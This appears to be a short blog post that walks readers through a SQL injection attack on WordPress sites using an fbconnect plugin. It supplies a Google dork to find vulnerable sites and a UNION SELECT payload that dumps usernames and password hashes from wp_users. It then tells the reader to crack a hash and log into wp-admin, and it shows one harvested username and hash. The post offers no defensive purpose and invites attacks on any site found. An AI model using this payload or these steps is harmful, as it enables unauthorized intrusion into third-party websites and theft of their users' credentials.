inurl:"fbconnect_action=myhome"
Exploit:
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,
7,8,9,10,11,12+from+wp_users--
1- Copy the dork and paste it on Google
2- Choose any site and you will see something like this or similar,
Exploiting Target
1- Let say your target URL is like this,
http://www/site.com/?fbconnect_action=myhome&userid=3
Paste the exploit behind the URL, so it will be like this
http://www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)
z0mbyak,7,8,9,10,11,12+from+wp_users--
2- So there you go, you have the Username and the Password. But, don't forget to decrypt it first ;)
user:password
So in this case, the user is MarkMullins and the password is $P$BN0PffKCxFw7aBpWfeUz/kSumdPaeR.
3- After you have successfully decrypt the password, you can login into the website at
www.site.com/wp-login.php
or
www.site.com/wp-admin
* Decryption
No comments:
Post a Comment